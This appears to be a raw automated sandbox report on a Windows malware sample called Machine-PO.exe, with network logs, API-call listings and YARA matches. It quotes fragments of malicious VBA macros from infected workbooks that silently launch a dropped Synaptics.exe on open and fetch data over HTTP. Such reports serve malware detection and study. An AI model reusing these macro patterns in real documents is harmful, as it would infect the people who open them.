                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49710 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49709 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49716 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49717 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49726 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49727 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49740 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49739 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49744 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49746 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49754 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49756 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49768 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49769 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49773 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49776 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49790 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49792 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49791 version: TLS 1.2
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00257099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00257099
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00257294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00257294
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00257099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00257099
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00244342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,10_2_00244342
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0026F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0026F5D0

                              System Summary

                              barindex
                              Document contains an embedded VBA macro with suspicious strings
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Document contains an embedded VBA with functions possibly related to ADO stream file operations
                              Source: GZrLyJhZ.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: SQSJKEBWDT.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Document contains an embedded VBA with functions possibly related to HTTP operations
                              Source: GZrLyJhZ.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: SQSJKEBWDT.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                              Source: GZrLyJhZ.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: SQSJKEBWDT.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Windows Scripting host queries suspicious COM object (likely to drop second stage)
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0024702F: CreateFileW,DeviceIoControl,CloseHandle,10_2_0024702F
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0023B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_0023B9F1
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002482D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_002482D0
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0020DCD010_2_0020DCD0
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0020A0C010_2_0020A0C0
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0022018310_2_00220183
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0024220C10_2_0024220C
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0020853010_2_00208530
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0020667010_2_00206670
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0022067710_2_00220677
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0023877910_2_00238779
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0026A8DC10_2_0026A8DC
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00220A8F10_2_00220A8F
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00206BBC10_2_00206BBC
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00208CA010_2_00208CA0
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0022AC8310_2_0022AC83
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0021AD5C10_2_0021AD5C
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00234EBF10_2_00234EBF
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00220EC410_2_00220EC4
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002630AD10_2_002630AD
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0023113E10_2_0023113E
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002212F910_2_002212F9
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0023542F10_2_0023542F
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0026F5D010_2_0026F5D0
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0021368010_2_00213680
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0023599F10_2_0023599F
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0022DA7410_2_0022DA74
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00205D3210_2_00205D32
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0020BDF010_2_0020BDF0
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0022BDF610_2_0022BDF6
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00221E5A10_2_00221E5A
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0022DF6910_2_0022DF69
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0024BFB810_2_0024BFB8
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00237FFD10_2_00237FFD
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: GZrLyJhZ.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: SQSJKEBWDT.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCX7868.tmp 449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: String function: 00227750 appears 42 times
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: String function: 0021F885 appears 68 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 2996
                              Source: Machine-PO.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Machine-PO.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX7868.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Machine-PO.exe
                              Source: Machine-PO.exe, 00000000.00000000.1488871651.0000000000617000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs Machine-PO.exe
                              Source: Machine-PO.exe, 00000000.00000003.1497644729.00000000007F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Machine-PO.exe
                              Source: Machine-PO.exe, 00000000.00000003.1497644729.00000000007F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameD vs Machine-PO.exe
                              Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs Machine-PO.exe
                              Source: Machine-PO.exeBinary or memory string: OriginalFileName vs Machine-PO.exe
                              Source: Machine-PO.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@23/39@6/4
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0024D712 GetLastError,FormatMessageW,10_2_0024D712
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0023B8B0 AdjustTokenPrivileges,CloseHandle,10_2_0023B8B0
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0023BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_0023BEC3
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0024EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,10_2_0024EA85
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00246F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,10_2_00246F5B
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0025C604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,10_2_0025C604
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002031F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_002031F2
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile created: C:\Users\user\Desktop\._cache_Machine-PO.exeJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6892
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeFile created: C:\Users\user\AppData\Local\Temp\UAINOJ.vbsJump to behavior
                              Source: Yara matchFile source: Machine-PO.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.Machine-PO.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX7868.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs
                              Source: C:\Users\user\Desktop\Machine-PO.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
